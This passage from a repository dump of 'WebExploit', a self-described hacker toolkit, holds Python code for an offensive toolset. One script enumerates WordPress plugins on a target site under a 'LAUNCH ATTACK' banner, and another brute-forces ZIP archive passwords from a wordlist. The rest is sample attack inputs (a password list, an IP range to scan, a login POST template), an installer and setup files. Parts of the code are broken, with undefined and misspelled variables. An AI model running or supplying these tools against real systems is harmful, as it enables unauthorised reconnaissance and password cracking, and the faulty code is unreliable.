r.get(url+"/wp-content/plugins/", headers=headers1) 150 | checker.raise_for_status() 151 | except r.exceptions.RequestException as url_error: 152 | 153 | print (f' {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}W.P.F/{f.GREEN}REQUEST-MAKER{white}] {nbold}{f.CYAN} CAN\'T CONNECT TO \'{bold}{url}{nbold}\'{nbold} ERROR: {bold}{url_error}{nbold}\n') 154 | t.sleep(2) 155 | raise SystemExit(url_error) 156 | #sys.exit() 157 | 158 | if checker.status_code == 404 or checker.status_code == 500: 159 | print (f' {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}W.P.F/{f.GREEN}CHECK-URL] {nbold}{f.CYAN} URL IS NOT \'{bold}WORDPRESS{nbold}\'{nbold} CHECK THAT ... !\n') 160 | sys.exit() 161 | else: 162 | print (f' {f.WHITE}[{f.GREEN}{bold}SUCCESS{f.WHITE}{nbold}@{f.RED}W.P.F/{f.GREEN}Checker] {nbold}{f.CYAN} The {url} is \'{bold}WORDPRESS{nbold}\' \n') 163 | 164 | t.sleep(1) 165 | print (f'\n {f.WHITE}[{f.YELLOW}WARNING{f.WHITE}] if you dont have plugin file press ENTER for using {bold}default plugins{nbold} ! sleeping ', end='', flush=True) 166 | t.sleep(1) 167 | print ('5 ', end='', flush=True) 168 | t.sleep(1) 169 | print ('4 ', end='', flush=True) 170 | t.sleep(1) 171 | print ('3 ', end='', flush=True) 172 | t.sleep(1) 173 | print ('2 ', end='', flush=True) 174 | t.sleep(1) 175 | print ('1 ', flush=True) 176 | t.sleep(1) 177 | print('') 178 | plugins = [] 179 | 180 | files = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}W.P.F/{bold}WP-PLUGIN{nbold}{f.WHITE} enter \'WordPress-{bold}PLUGIN[FILE.TXT]{nbold}\' [ex: wp-plugins.txt]:#{f.GREEN}{bold} ') 181 | print('') 182 | try: 183 | plugins = open(files, 'r').read().split() 184 | 185 | except Exception as file_err: 186 | print (f' {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}W.P.F/{f.GREEN}Plugins{white}] {nbold}{f.CYAN} ERROR : \'{bold}{file_err}{nbold}\' \n') 187 | t.sleep(1) 188 | 189 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}W.P.F/{f.CYAN}DEFAULT{f.WHITE}] OPENNING {bold}DEFAULT{nbold} TOP PLUGINS FILE {bold}{f.GREEN}\n') 190 | filedefault = (f'{os.getcwd()}/cores/wp-plugins.txt') 191 | plugins = open(filedefault, 'r').read().split() 192 | t.sleep(2) 193 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}W.P.F/{f.CYAN}DEFAULT{f.WHITE}] LOADED {bold}%s PLUGINS{nbold}{f.GREEN} SUCCESS ...{white}\n' % len(plugins)) 194 | t.sleep(2) 195 | 196 | bw_ = ['chrome','firefox','opera'] 197 | os_ = ['win','mac'',lin'] 198 | 199 | 200 | if url[-1:] == '/': 201 | pass 202 | else: 203 | url = (f'{url}/') 204 | 205 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{nbold}{f.WHITE}] {bold}WPF{nbold} LAUNCH ATTACK . . . \n') 206 | t.sleep(2) 207 | for plugin in plugins: 208 | 209 | # browser = choice(bw_) 210 | # operation_system = choice(os_) 211 | # 212 | # 213 | # headers = Headers( 214 | # browser=browser, 215 | # os=operation_system, 216 | # headers=True).generate() 217 | 218 | urlq = (url+"wp-content/plugins/"+plugin) 219 | 'if have error set headers in Result' 220 | try: 221 | Result = r.get(urlq) 222 | except Exception as err: 223 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} HAVE {err} ERROR ! IN URL {f.WHITE}~> [{f.RED}{bold}{urlq}{nbold}{f.WHITE}] \n') 224 | continue 225 | if Result.status_code == 200: 226 | print (f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}WPF/{f.WHITE}STATUS-{bold}{f.GREEN}{Result.status_code}{nbold}{f.WHITE}] PLUGINFOUNDED {f.WHITE}~> [{f.GREEN}{bold}{urlq}{nbold}{f.WHITE}] \n') 227 | #elif ? 228 | if Result.status_code == 404 or Result.status_code == 500: 229 | print (f' {f.WHITE}[{f.YELLOW}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}WPF/{f.WHITE}STATUS-{f.YELLOW}{bold}{Result.status_code}{nbold}{f.WHITE}] PLUGIN NOT FOUND {f.WHITE}~> [{f.RED}{bold}{urlq}{nbold}{f.WHITE}] \n') 230 | #elif ? 231 | if Result.status_code == 403: 232 | print (f' {f.WHITE}[{f.RED}{bold}WebExploit{f.WHITE}{nbold}@{f.CYAN}WPF/{f.WHITE}STATUS-{bold}{f.RED}{Result.status_code}{nbold}{f.WHITE}]{f.RED} FORBIDDEN {f.WHITE}~> [{f.RED}{bold}{urlq}{nbold}{f.WHITE}] \n') 233 | #elif ? 234 | # if Result.status_code in range(499,600): 235 | # print (f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}WPF/{f.WHITE}STATUS-{f.YELLOW}{Result.status_code}{nbold}{f.WHITE}]{f.RED} SERVER ERROR {f.WHITE}~> [{f.YELLOW}{urlq}{nbold}{f.WHITE}] \n') 236 | 237 | # if Result.status_code == 301 or Result.status_code == 302: 238 | # print (f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}WPF/{f.WHITE}STATUS-{f.YELLOW}{Result.status_code}{nbold}{f.WHITE}]{f.CYAN} REDIRECT {f.WHITE}~> [{f.YELLOW}{urlq}{nbold}{f.WHITE}] \n') 239 | 240 | else: 241 | pass 242 | 243 | 244 | 245 | 246 | 247 | -------------------------------------------------------------------------------- /cores/zipc.py: -------------------------------------------------------------------------------- 1 | def run(): 2 | ''' 3 | MIT License 4 | 5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r] 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy 8 | of this software and associated documentation files (the "Software"), to deal 9 | in the Software without restriction, including without limitation the rights 10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | copies of the Software, and to permit persons to whom the Software is 12 | furnished to do so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | ''' 25 | 'pip install google-search' 26 | try: 27 | import time as t 28 | from colorama import Fore as f 29 | import sys, os 30 | import zipfile 31 | from random import choice 32 | except: 33 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !") 34 | t.sleep(1) 35 | sys.exit() 36 | 37 | black = "\033[0;30m" 38 | red = "\033[0;31m" 39 | green = "\033[0;32m" 40 | brown = "\033[0;33m" 41 | blue = "\033[0;34m" 42 | purple = "\033[0;35m" 43 | cyan = "\033[0;36m" 44 | l_gray = "\033[0;37m" 45 | dark_gray = "\033[1;30m" 46 | l_red = "\033[1;31m" 47 | l_green = "\033[1;32m" 48 | yellow = "\033[1;33m" 49 | l_blue = "\033[1;34m" 50 | l_purple = "\033[1;35m" 51 | l_cyan = "\033[1;36m" 52 | l_white = "\033[1;37m" 53 | faint = "\033[2m" 54 | italic = "\033[3m" 55 | underline = "\033[4m" 56 | blink = "\033[5m" 57 | nefative = "\033[7m" 58 | cross = "\033[9m" 59 | ended = "\033[0m" 60 | bold = "\033[1m" 61 | nbold = "\033[0m" 62 | white = f.WHITE 63 | 64 | bnr = [''' 65 | ▒███████▒ ██ ██▓███ 66 | ▒ ▒ ▒ ▄▀░ ▒▓██ ▓██░ ██ 67 | ░ ▒ ▄▀▒░ ░▒██ ▓██░ ██▓▒ 68 | ▄▀▒ ░ ░██ ▒██▄█▓▒ ▒ 69 | ▒███████▒ ░██ ▒██▒ ░ ░ 70 | ░▒▒ ▓░▒░▒ ░▓ ▒▓▒░ ░ ░ 71 | ░ ▒ ▒ ░ ▒ ▒ ░▒ ░ 72 | ░ ░ ░ ░ ░ ▒ ░░ 73 | ░ ░ ░ ''', ''' 74 | ░▒█▀▀▀█░░░▀█▀░░░▒█▀▀█ 75 | ░░▄▄▄▀▀░░░▒█░░░░▒█▄▄█ 76 | ░▒█▄▄▄█░░░▄█▄░░░▒█░░░ '''] 77 | 78 | def r_bnr(bnr): 79 | return choice(bnr) 80 | 81 | print (f'{blink}{r_bnr(bnr)}{ended}', end='') 82 | t.sleep(2) 83 | print(f' {italic}From{ended} : ', end='') 84 | #create flush text [simple] 85 | print(f'{red}{bold}', end='', flush=True) 86 | print(f'{bold}W', end='', flush=True) 87 | t.sleep(0.5) 88 | print('e', end='', flush=True) 89 | t.sleep(0.7) 90 | print('b', end='', flush=True) 91 | t.sleep(0.4) 92 | print('E', end='', flush=True) 93 | t.sleep(0.1) 94 | print('x', end='', flush=True) 95 | t.sleep(0.2) 96 | print('p', end='', flush=True) 97 | t.sleep(0.3) 98 | print('l', end='', flush=True) 99 | t.sleep(0.4) 100 | print('o', end='', flush=True) 101 | t.sleep(0.5) 102 | print('i', end='', flush=True) 103 | t.sleep(1.5) 104 | print(f't{ended}', flush=True) 105 | nbold = "\033[0m" # tahe koskholi ! 106 | t.sleep(1) 107 | print(f'{white}{nbold}') 108 | 109 | print (f'\n {bold}{f.GREEN}[{f.WHITE}ZIP{f.GREEN}]{f.WHITE}{f.RED} Z.I.P{f.WHITE}{bold} ZIP {bold}C{nbold}racker T00L !\n\n\n') 110 | t.sleep(3) 111 | 112 | 113 | 114 | 115 | while True: 116 | try: 117 | zipc = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}Z.I.P/{bold}FILE[zip]{nbold}{f.WHITE} enter {bold}\'zipFile{nbold}\' [ex: /Desktop/mji.zip]:#{f.GREEN}{bold} ') 118 | print(f'{nbold}') 119 | 120 | if zipc: 121 | break 122 | else: 123 | input('please enter a zip file') 124 | continue 125 | 126 | except Exception as err_zipc: 127 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] {bold}ERROR -> {err_zipc}{nbold} EXITTING . . .') 128 | t.sleep(2) 129 | # break 130 | sys.exit(0) 131 | while True: 132 | passwords = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}Z.I.P/{bold}ZIP-CRACKER{nbold}{f.WHITE} enter \'Password LIST{nbold}\' [ex: /home/WebExploit/Desktop/ssh-passwords.txt]:#{f.GREEN}{bold} ') 133 | if passwords: 134 | try: 135 | passes = open(passwords, 'r').readlines() 136 | # passes.close() 137 | break 138 | except Exception as file_err: 139 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}RARC/{f.GREEN}Passwords{white}] {nbold}{f.CYAN} ERROR : \'{bold}{file_err}{nbold}\' \n') 140 | t.sleep(1) 141 | continue 142 | t.sleep(1) 143 | print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}Z.I.P/{bold}ZIP-CRACKER{nbold}{f.YELLOW} Loadind modules {bold}zip-cracker . . . !{nbold}]') 144 | t.sleep(3) 145 | try: 146 | zip_file = zipc 147 | zip_file = zipfile.ZipFile(zip_file) 148 | except Exception as g_err: 149 | print ('err : %s' % g_err) 150 | for pwd_ in passes: 151 | pwd1 = pwd_.strip() 152 | try: 153 | zip_file.extractall(pwd=pwd1.encode()) 154 | print (f'\n {nbold}{f.WHITE}[{f.GREEN}{bold}CRACKER{f.WHITE}{nbold}@{f.RED}ZIP.C/{f.GREEN}Password-Found{white}] {nbold}{f.CYAN} \'{bold}{pwd_}{nbold}\' \n') 155 | except: 156 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}CRACKER{f.WHITE}{nbold}@{f.RED}ZIP.C/{f.YELLOW}Password-NotFound{white}] {nbold}{f.RED} \'{bold}{pwd_}{nbold}\' \n') 157 | continue 158 | else: 159 | print(f'{green}') 160 | print("[ZIP-C] Password found:", word.decode().strip()) 161 | exit(0) 162 | print(f'{red}') 163 | print("[ZIP-C] Password not found, try other wordlist [password-lists].") 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | -------------------------------------------------------------------------------- /examples/data_httpGet_example.txt: -------------------------------------------------------------------------------- 1 | user=$USER$&password=$PASSWORD$ 2 | -------------------------------------------------------------------------------- /examples/header.json: -------------------------------------------------------------------------------- 1 | {'Host': 'google.com', 2 | 'User-Agent': 'Mozilla/5.0 (X11; Linux aarch64; rv:91.0) Gecko/20100101 Firefox/91.0', 3 | 'Accept': '*/*', 4 | 'Accept-Language': 'en-US,en;q=0.5', 5 | 'Accept-Encoding': 'gzip, deflate, br', 6 | 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 7 | 'X-Requested-With': 'XMLHttpRequest', 8 | 'Content-Length': '16', 9 | 'Origin': 'https://google.com', 10 | 'Connection': 'keep-alive', 11 | 'Sec-Fetch-Dest': 'empty', 12 | 'Sec-Fetch-Mode': 'cors', 13 | 'Sec-Fetch-Site': 'same-origin'} 14 | -------------------------------------------------------------------------------- /examples/hosts_ForAngryIpScanner.txt: -------------------------------------------------------------------------------- 1 | 216.239.38.120 2 | 1.1.1.1 3 | -------------------------------------------------------------------------------- /examples/ipRange_Example.txt: -------------------------------------------------------------------------------- 1 | 37.255.241.* 2 | 3 | 4 | #example for angry ip scanner tool [ip addr range scanner] 5 | -------------------------------------------------------------------------------- /examples/passlist_example.txt: -------------------------------------------------------------------------------- 1 | 1234 2 | sudo 3 | root 4 | admin 5 | sudomji 6 | kskskdkd 7 | -------------------------------------------------------------------------------- /examples/users.txt: -------------------------------------------------------------------------------- 1 | jfkwosodo 2 | sshocean-mnmnmn 3 | -------------------------------------------------------------------------------- /files/.version: -------------------------------------------------------------------------------- 1 | 1.1.0-release-2024 2 | -------------------------------------------------------------------------------- /files/updateControl.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from requests import get 3 | 4 | def update(ver:str=None): 5 | 6 | ver: str = open('.version', 'r').read() 7 | 8 | githubVerionController: str = get('https://raw.githubusercontent.com/C4ssif3r/WebExploit/main/files/.version').text 9 | 10 | if ver != githubVerionController: 11 | upsateQuestion = input (f'update available !\n web explloit new verion: {githubVerionController}\nare you want to update ? [y/n] ') 12 | if updateQuestion == 'y': -------------------------------------------------------------------------------- /img/APS.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/img/APS.jpg -------------------------------------------------------------------------------- /img/Infog_menu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/img/Infog_menu.png -------------------------------------------------------------------------------- /img/PasswordCrack.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/img/PasswordCrack.png -------------------------------------------------------------------------------- /img/WebExploit.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/img/WebExploit.jpg -------------------------------------------------------------------------------- /img/WebExploitMenu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/img/WebExploitMenu.png -------------------------------------------------------------------------------- /img/eyecrackerMojiana.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/img/eyecrackerMojiana.jpg -------------------------------------------------------------------------------- /img/history: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /img/privateWebHacking.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/img/privateWebHacking.png -------------------------------------------------------------------------------- /installer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | declare -a packages=( 4 | "python" 5 | "python-pip" 6 | ) 7 | echo -e "\n\033[1;37m[\033[1;31mWebExploit\033[1;37m] - UPDATING PACKAGES ...\n" 8 | sleep 3 9 | if [ `id -u` == 0 ]; then 10 | echo -e "\033[1;37m[\033[1;31mWebExploit\033[1;37m] - INSTALLING PACKAGES ...\n" 11 | sleep 3 12 | sudo apt update -y > /dev/null 2>&1 13 | sudo apt upgrade -y > /dev/null 2>&1 14 | echo -e "\033[1;37m[\033[1;32mWebExploit\033[1;37m] - INSTALLED SUCCESSFUL. \n" 15 | sleep 3 16 | for packages in "${packages[@]}"; do 17 | sudo apt install $packages -y > /dev/null 2>&1 18 | done 19 | 20 | else 21 | echo -e "\033[1;37m[\033[1;31mWebExploit\033[1;37m] - INSTALLING PACKAGES ...\n" 22 | sleep 3 23 | apt update -y > /dev/null 2>&1 24 | apt upgrade -y > /dev/null 2>&1 25 | echo -e "\033[1;37m[\033[1;32mWebExploit\033[1;37m] - INSTALLED SUCCESSFUL. \n" 26 | sleep 3 27 | for packages in "${packages[@]}"; do 28 | apt install $packages -y > /dev/null 2>&1 29 | done 30 | 31 | fi 32 | echo -e "\033[1;37m[\033[1;32mWebExploit\033[1;37m] - INSTALLED SUCCESSFUL. \n" 33 | sleep 3 34 | # finally 35 | echo -e "\033[1;37m[\033[1;31mWebExploit\033[1;37m] - \033[1;32mINSTALLING WEB-EXPLOIT REQUIREMENTS ...\033[1;37m\n" 36 | sleep 3 37 | chmod 777 setup.py 38 | 39 | python setup.py install > /dev/null 2>&1 40 | 41 | echo -e "\033[1;37m[\033[1;32mWebExploit\033[1;37m] - INSTALLED SUCCESSFUL. \n" 42 | sleep 3 43 | echo -e "\033[1;37m[\033[1;32mWebExploit\033[1;37m] - NOW TYPE \033[1;32mpython WebExploit.py\033[1;37m FOR RUN :).\n" 44 | sleep 3 45 | 46 | -------------------------------------------------------------------------------- /licence/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 MJi | DarkƤwn 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | treelib==1.6.4 2 | paramiko 3 | requests 4 | colorama 5 | fake_useragent 6 | fake_headers 7 | requests[socks] 8 | torrequest 9 | rarfile 10 | six==1.16.0 11 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | try: from setuptools import setup, find_packages 2 | except: 3 | from subprocess import Popen 4 | Popen("pip install setuptools") 5 | from setuptools import setup, find_packages 6 | 7 | def read_requirements(file): 8 | with open(file) as f: 9 | return f.read().splitlines() 10 | 11 | def read_file(file): 12 | with open(file) as f: 13 | return f.read() 14 | 15 | long_description = read_file("README.md") 16 | version = read_file("VERSION") 17 | requirements = read_requirements("requirements.txt") 18 | 19 | setup( 20 | name = 'WebExploit', 21 | version = version, 22 | author = 'Mojia', 23 | author_email = 'sudo.root.desktop@gmail.com', 24 | url = 'https://github.com/c4ssif3r/WebExploit', 25 | description = 'Advanced Hacker Toolkit in your hands. WebExploit XD', 26 | long_description_content_type = "text/x-rst", 27 | long_description = long_description, 28 | license = "MIT license", 29 | packages = find_packages(exclude=["cores"]), 30 | install_requires = requirements, 31 | classifiers=[ 32 | "Programming Language :: Python :: 3", 33 | "License :: MIT License", 34 | "Operating System :: OS Independent", 35 | ] 36 | ) 37 | --------------------------------------------------------------------------------